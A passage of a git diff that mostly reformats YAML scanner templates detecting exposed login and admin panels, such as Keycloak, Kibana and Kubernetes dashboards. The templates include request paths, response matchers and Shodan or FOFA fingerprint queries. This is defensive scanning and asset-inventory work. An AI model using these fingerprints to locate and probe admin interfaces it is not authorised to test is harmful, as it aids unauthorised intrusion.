cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kafka,apache metadata: max-request: 1 + tags: panel,kafka,apache http: - method: GET diff --git a/http/exposed-panels/kanboard-login.yaml b/http/exposed-panels/kanboard-login.yaml index e69386fac5..4eecf09493 100644 --- a/http/exposed-panels/kanboard-login.yaml +++ b/http/exposed-panels/kanboard-login.yaml @@ -7,11 +7,11 @@ info: description: Kanboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:2056442365 tags: panel,kanboard @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/kasm-login-panel.yaml b/http/exposed-panels/kasm-login-panel.yaml index afc81002d0..75c30a9f2a 100644 --- a/http/exposed-panels/kasm-login-panel.yaml +++ b/http/exposed-panels/kasm-login-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-2144699833 - verified: true tags: panel,kasm,login,detect http: @@ -22,7 +22,6 @@ http: - | GET /#/login HTTP/1.1 Host: {{Hostname}} - - | POST /api/login_settings HTTP/1.1 Host: {{Hostname}} @@ -31,6 +30,7 @@ http: {"token":null,"username":null} stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/kavita-panel-detect.yaml b/http/exposed-panels/kavita-panel-detect.yaml index 158f1f83e0..780b5762cd 100644 --- a/http/exposed-panels/kavita-panel-detect.yaml +++ b/http/exposed-panels/kavita-panel-detect.yaml @@ -10,11 +10,11 @@ info: - https://github.com/kareadita/kavita classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"kavita" tags: panel,kavita diff --git a/http/exposed-panels/keenetic-web-login.yaml b/http/exposed-panels/keenetic-web-login.yaml index 4b0a556093..948b1064b1 100644 --- a/http/exposed-panels/keenetic-web-login.yaml +++ b/http/exposed-panels/keenetic-web-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6817 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,keenetic,edb metadata: max-request: 1 + tags: panel,keenetic,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'Keenetic Web' + - type: status status: - 200 diff --git a/http/exposed-panels/kenesto-login.yaml b/http/exposed-panels/kenesto-login.yaml index fae8aeb16f..b1a8b233f8 100644 --- a/http/exposed-panels/kenesto-login.yaml +++ b/http/exposed-panels/kenesto-login.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: info description: Kenesto login panel was discovered. - metadata: - max-request: 1 - fofa-query: 'app="kenesto"' - tags: login,tech,kenesto,panel reference: - https://www.kenesto.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 + metadata: + max-request: 1 + fofa-query: 'app="kenesto"' + tags: login,tech,kenesto,panel http: - method: GET diff --git a/http/exposed-panels/kentico-login.yaml b/http/exposed-panels/kentico-login.yaml index 518717c1d6..24e1f0e0db 100644 --- a/http/exposed-panels/kentico-login.yaml +++ b/http/exposed-panels/kentico-login.yaml @@ -9,11 +9,11 @@ info: - https://docs.xperience.io/k8/using-the-kentico-interface classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login,kentico metadata: max-request: 1 + tags: panel,login,kentico http: - method: GET @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: dsl diff --git a/http/exposed-panels/kerio-connect-client.yaml b/http/exposed-panels/kerio-connect-client.yaml index 2ac65647ac..2e4da20baa 100644 --- a/http/exposed-panels/kerio-connect-client.yaml +++ b/http/exposed-panels/kerio-connect-client.yaml @@ -7,7 +7,7 @@ info: description: Kerio Connect login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/kettle-panel.yaml b/http/exposed-panels/kettle-panel.yaml index b8ecc3bc14..e751cbbab8 100644 --- a/http/exposed-panels/kettle-panel.yaml +++ b/http/exposed-panels/kettle-panel.yaml @@ -7,11 +7,11 @@ info: description: Kettle panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: basic realm="Kettle" tags: panel,kettle diff --git a/http/exposed-panels/keycloak-admin-panel.yaml b/http/exposed-panels/keycloak-admin-panel.yaml index 1a4e51be83..46fb7ea187 100644 --- a/http/exposed-panels/keycloak-admin-panel.yaml +++ b/http/exposed-panels/keycloak-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Keycloak admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.favicon.hash:-1105083093 tags: panel,keycloak @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/kfm/kaes-file-manager.yaml b/http/exposed-panels/kfm/kaes-file-manager.yaml index d6208af284..82ebd8df1a 100644 --- a/http/exposed-panels/kfm/kaes-file-manager.yaml +++ b/http/exposed-panels/kfm/kaes-file-manager.yaml @@ -7,11 +7,11 @@ info: description: Kae's File Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kaes,filemanager,kfm metadata: max-request: 1 + tags: panel,kaes,filemanager,kfm http: - method: GET @@ -20,7 +20,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/kfm/kfm-login-panel.yaml b/http/exposed-panels/kfm/kfm-login-panel.yaml index a846433b76..3d20117a2c 100644 --- a/http/exposed-panels/kfm/kfm-login-panel.yaml +++ b/http/exposed-panels/kfm/kfm-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Kae's File Manager admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kfm metadata: max-request: 1 + tags: panel,kfm http: - method: GET @@ -20,7 +20,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/kibana-panel.yaml b/http/exposed-panels/kibana-panel.yaml index aabf2afc74..e455066de4 100644 --- a/http/exposed-panels/kibana-panel.yaml +++ b/http/exposed-panels/kibana-panel.yaml @@ -7,7 +7,7 @@ info: description: Kibana login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 3 @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index 280ee4ceac..15e1c16eb7 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -9,7 +9,7 @@ info: - https://kiwitcms.org classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/kkfileview-panel.yaml b/http/exposed-panels/kkfileview-panel.yaml index 5006b75616..cf10f6cc64 100644 --- a/http/exposed-panels/kkfileview-panel.yaml +++ b/http/exposed-panels/kkfileview-panel.yaml @@ -7,11 +7,11 @@ info: description: kkFileView panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"kkFileView" tags: panel,kkfileview diff --git a/http/exposed-panels/klr300n-panel.yaml b/http/exposed-panels/klr300n-panel.yaml index cd9b0da37f..4767b96f6c 100644 --- a/http/exposed-panels/klr300n-panel.yaml +++ b/http/exposed-panels/klr300n-panel.yaml @@ -10,9 +10,9 @@ info: - http://www.keo.com.br/produtos/roteador-klr-300n - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf metadata: + verified: true max-request: 1 fofa-query: "Roteador Wireless KLR 300N" - verified: true tags: keo,klr300n,panel,login http: diff --git a/http/exposed-panels/kodak-network-panel.yaml b/http/exposed-panels/kodak-network-panel.yaml index 7fb3fe04fb..a8e93cfed7 100644 --- a/http/exposed-panels/kodak-network-panel.yaml +++ b/http/exposed-panels/kodak-network-panel.yaml @@ -7,9 +7,9 @@ info: description: | A Kedacom network keyboard console panel was detected. metadata: + verified: true max-request: 1 fofa-query: "网络键盘控制台" - verified: true tags: panel,login,kedacom,network http: diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index cbe5879ee1..1a4a0ab0f6 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/pantsel/konga classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,konga,oss,panel metadata: max-request: 1 + tags: tech,konga,oss,panel http: - method: GET diff --git a/http/exposed-panels/kraken-cluster-monitoring.yaml b/http/exposed-panels/kraken-cluster-monitoring.yaml index 663891f4ec..7836a4975b 100644 --- a/http/exposed-panels/kraken-cluster-monitoring.yaml +++ b/http/exposed-panels/kraken-cluster-monitoring.yaml @@ -7,11 +7,11 @@ info: description: Kraken Cluster Monitoring Dashboard was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Kraken dashboard" tags: panel,kraken,cluster diff --git a/http/exposed-panels/kronos-workforce-central.yaml b/http/exposed-panels/kronos-workforce-central.yaml index cb37e1fac4..807f7dfca4 100644 --- a/http/exposed-panels/kronos-workforce-central.yaml +++ b/http/exposed-panels/kronos-workforce-central.yaml @@ -7,11 +7,11 @@ info: description: Kronos Workforce Central login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kronos metadata: max-request: 1 + tags: panel,kronos http: - method: GET diff --git a/http/exposed-panels/kubernetes-dashboard.yaml b/http/exposed-panels/kubernetes-dashboard.yaml index 516ef6b59b..c34ea3a810 100644 --- a/http/exposed-panels/kubernetes-dashboard.yaml +++ b/http/exposed-panels/kubernetes-dashboard.yaml @@ -7,16 +7,17 @@ info: description: Kubernetes Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kubernetes,devops metadata: max-request: 1 + tags: panel,kubernetes,devops http: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index 5fbcec424d..403ab5a6c0 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -7,7 +7,7 @@ info: description: Kubernetes Enterprise Manager panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index db191d3289..53b7020d78 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -7,11 +7,11 @@ info: description: Mirantis Kubernetes Engine panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Mirantis Kubernetes Engine" fofa-query: app="Mirantis-Kubernetes-Engine" tags: tech,kubernetes,devops,kube,k8s,panel diff --git a/http/exposed-panels/kubernetes-web-view.yaml b/http/exposed-panels/kubernetes-web-view.yaml index 94823872a0..ebfa3423ca 100644 --- a/http/exposed-panels/kubernetes-web-view.yaml +++ b/http/exposed-panels/kubernetes-web-view.yaml @@ -3,15 +3,15 @@ id: kubernetes-web-view info: name: Kubernetes Local Cluster Web View Panel- Detect author: tess - description: Kubernetes local cluster web view panel discovered. severity: medium + description: Kubernetes local cluster web view panel discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Kubernetes Web View" tags: panel,misconfig,kubernetes,k8s diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 9dcfea3e9f..05aa170a56 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -8,11 +8,11 @@ info: KubeView dashboard was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-379154636 tags: exposure,k8s,kubernetes,kubeview,dashboard,panel diff --git a/http/exposed-panels/labkey-server-login.yaml b/http/exposed-panels/labkey-server-login.yaml index 8e310948dd..1b93a50092 100644 --- a/http/exposed-panels/labkey-server-login.yaml +++ b/http/exposed-panels/labkey-server-login.yaml @@ -7,11 +7,11 @@ info: description: LabKey Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: 'title:"Sign In: /home"' tags: panel,labkey @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/login/home/login.view' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/labtech-panel.yaml b/http/exposed-panels/labtech-panel.yaml index f77c8bda91..abc5b6dc96 100644 --- a/http/exposed-panels/labtech-panel.yaml +++ b/http/exposed-panels/labtech-panel.yaml @@ -7,11 +7,11 @@ info: description: LabTech Web Portal login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,labtech metadata: max-request: 1 + tags: panel,labtech http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/lacie-panel.yaml b/http/exposed-panels/lacie-panel.yaml index bc77a8d3ae..e259368eb4 100644 --- a/http/exposed-panels/lacie-panel.yaml +++ b/http/exposed-panels/lacie-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7118 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,lacie,login,edb metadata: max-request: 2 + tags: panel,lacie,login,edb http: - method: GET diff --git a/http/exposed-panels/lancom-router-panel.yaml b/http/exposed-panels/lancom-router-panel.yaml index b67ac1c26b..089ff18e06 100644 --- a/http/exposed-panels/lancom-router-panel.yaml +++ b/http/exposed-panels/lancom-router-panel.yaml @@ -7,11 +7,11 @@ info: description: Lancom router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"LANCOM Systems GmbH" tags: panel,lancom,router diff --git a/http/exposed-panels/landrayoa-panel.yaml b/http/exposed-panels/landrayoa-panel.yaml index 945d97a6eb..76b15774c2 100644 --- a/http/exposed-panels/landrayoa-panel.yaml +++ b/http/exposed-panels/landrayoa-panel.yaml @@ -7,11 +7,11 @@ info: description: Landray login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,landrayoa metadata: max-request: 1 + tags: panel,landrayoa http: - method: GET diff --git a/http/exposed-panels/lansweeper-login.yaml b/http/exposed-panels/lansweeper-login.yaml index 0d6b91a009..1dcc5b8110 100644 --- a/http/exposed-panels/lansweeper-login.yaml +++ b/http/exposed-panels/lansweeper-login.yaml @@ -7,11 +7,11 @@ info: description: Lansweeper login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Lansweeper - Login" tags: lansweeper,tech,panel diff --git a/http/exposed-panels/lantronix-webmanager-panel.yaml b/http/exposed-panels/lantronix-webmanager-panel.yaml index 03e8d13fdd..836eafc0b9 100644 --- a/http/exposed-panels/lantronix-webmanager-panel.yaml +++ b/http/exposed-panels/lantronix-webmanager-panel.yaml @@ -7,11 +7,11 @@ info: description: Lantronix Web Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,lantronix metadata: max-request: 1 + tags: panel,lantronix http: - method: GET @@ -20,7 +20,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/laravel-filemanager.yaml b/http/exposed-panels/laravel-filemanager.yaml index 808eef4f85..cf9a000991 100644 --- a/http/exposed-panels/laravel-filemanager.yaml +++ b/http/exposed-panels/laravel-filemanager.yaml @@ -9,11 +9,11 @@ info: - https://github.com/UniSharp/laravel-filemanager classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: laravel,filemanager,fileupload metadata: max-request: 1 + tags: laravel,filemanager,fileupload,intrusive http: - method: GET diff --git a/http/exposed-panels/ldap-account-manager-panel.yaml b/http/exposed-panels/ldap-account-manager-panel.yaml index 40e9260752..19ed0ff7cc 100644 --- a/http/exposed-panels/ldap-account-manager-panel.yaml +++ b/http/exposed-panels/ldap-account-manager-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.ldap-account-manager.org/lamcms/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"LDAP Account Manager" tags: panel,ldap diff --git a/http/exposed-panels/lenovo-fp-panel.yaml b/http/exposed-panels/lenovo-fp-panel.yaml index d0295922c5..4130801ba0 100644 --- a/http/exposed-panels/lenovo-fp-panel.yaml +++ b/http/exposed-panels/lenovo-fp-panel.yaml @@ -7,11 +7,11 @@ info: description: Lenovo Fan Power Controller login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"Fan and Power Controller" tags: panel,lenovo @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/lenovo-thinkserver-panel.yaml b/http/exposed-panels/lenovo-thinkserver-panel.yaml index 74f4863154..b6f5540d36 100644 --- a/http/exposed-panels/lenovo-thinkserver-panel.yaml +++ b/http/exposed-panels/lenovo-thinkserver-panel.yaml @@ -7,11 +7,11 @@ info: description: Lenovo ThinkServer System Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,thinkserver,lenovo metadata: max-request: 1 + tags: panel,thinkserver,lenovo http: - method: GET diff --git a/http/exposed-panels/leostream-panel.yaml b/http/exposed-panels/leostream-panel.yaml index 1493257795..1d137e5c7c 100644 --- a/http/exposed-panels/leostream-panel.yaml +++ b/http/exposed-panels/leostream-panel.yaml @@ -9,7 +9,7 @@ info: - https://leostream.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/librenms-login.yaml b/http/exposed-panels/librenms-login.yaml index 86fd600bff..1787374083 100644 --- a/http/exposed-panels/librenms-login.yaml +++ b/http/exposed-panels/librenms-login.yaml @@ -7,7 +7,7 @@ info: description: LibreNMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/liferay-portal.yaml b/http/exposed-panels/liferay-portal.yaml index 2f0d47f7f9..57dcdf2821 100644 --- a/http/exposed-panels/liferay-portal.yaml +++ b/http/exposed-panels/liferay-portal.yaml @@ -10,11 +10,11 @@ info: - https://github.com/mzer0one/CVE-2020-7961-POC classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.favicon.hash:129457226 tags: panel,liferay,portal diff --git a/http/exposed-panels/linkerd-panel.yaml b/http/exposed-panels/linkerd-panel.yaml index 1f70c755ee..b489117366 100644 --- a/http/exposed-panels/linkerd-panel.yaml +++ b/http/exposed-panels/linkerd-panel.yaml @@ -8,11 +8,11 @@ info: Linkerd panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"data-controller-namespace" tags: panel,misconfig,linkerd,exposure diff --git a/http/exposed-panels/linksys-wifi-login.yaml b/http/exposed-panels/linksys-wifi-login.yaml index df3c31c576..3695c9b9b4 100644 --- a/http/exposed-panels/linksys-wifi-login.yaml +++ b/http/exposed-panels/linksys-wifi-login.yaml @@ -7,7 +7,7 @@ info: description: Linksys Smart Wi-Fi login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/livehelperchat-admin-panel.yaml b/http/exposed-panels/livehelperchat-admin-panel.yaml index 4507359ae0..853a0f38dc 100644 --- a/http/exposed-panels/livehelperchat-admin-panel.yaml +++ b/http/exposed-panels/livehelperchat-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Live Helper Chat admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Live Helper Chat" fofa-query: title="Live Helper Chat" tags: livehelperchat,panel diff --git a/http/exposed-panels/livezilla-login-panel.yaml b/http/exposed-panels/livezilla-login-panel.yaml index 99fd25e330..2194b4d61d 100644 --- a/http/exposed-panels/livezilla-login-panel.yaml +++ b/http/exposed-panels/livezilla-login-panel.yaml @@ -7,11 +7,11 @@ info: description: LiveZilla login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,livezilla,login metadata: max-request: 1 + tags: panel,livezilla,login http: - method: GET diff --git a/http/exposed-panels/locklizard-webviewer-panel.yaml b/http/exposed-panels/locklizard-webviewer-panel.yaml index 222af22a2e..501141389a 100644 --- a/http/exposed-panels/locklizard-webviewer-panel.yaml +++ b/http/exposed-panels/locklizard-webviewer-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.locklizard.com/pdf_security_webviewer/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Locklizard Web Viewer" tags: panel,locklizard,webviewer diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index df103f625d..968f4fbc46 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -7,11 +7,11 @@ info: description: Logitech Harmony Pro Installer Portal login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Logitech Harmony Pro Installer" tags: panel,logitech,harmony,exposure diff --git a/http/exposed-panels/looker-panel.yaml b/http/exposed-panels/looker-panel.yaml index abfe6fab40..98458e456c 100644 --- a/http/exposed-panels/looker-panel.yaml +++ b/http/exposed-panels/looker-panel.yaml @@ -7,11 +7,11 @@ info: description: Looker login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"lookerVersion" tags: panel,login,looker diff --git a/http/exposed-panels/loxone-panel.yaml b/http/exposed-panels/loxone-panel.yaml index 5d33c7ec79..f14467e2b7 100644 --- a/http/exposed-panels/loxone-panel.yaml +++ b/http/exposed-panels/loxone-panel.yaml @@ -7,11 +7,11 @@ info: description: Loxone Intercom Video panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Loxone Intercom Video" tags: panel,loxone diff --git a/http/exposed-panels/lucee-login.yaml b/http/exposed-panels/lucee-login.yaml index 4acd1dfc77..7217df67f7 100644 --- a/http/exposed-panels/lucee-login.yaml +++ b/http/exposed-panels/lucee-login.yaml @@ -7,7 +7,7 @@ info: description: Lucee admin login panels were detected in both Web and Server tabs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/luci-login-detection.yaml b/http/exposed-panels/luci-login-detection.yaml index ce491329a7..5e2094e8a4 100644 --- a/http/exposed-panels/luci-login-detection.yaml +++ b/http/exposed-panels/luci-login-detection.yaml @@ -7,11 +7,11 @@ info: description: LuCi login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: login metadata: max-request: 1 + tags: login http: - method: GET diff --git a/http/exposed-panels/mach-proweb-login.yaml b/http/exposed-panels/mach-proweb-login.yaml index 8e8def4337..514c05479c 100644 --- a/http/exposed-panels/mach-proweb-login.yaml 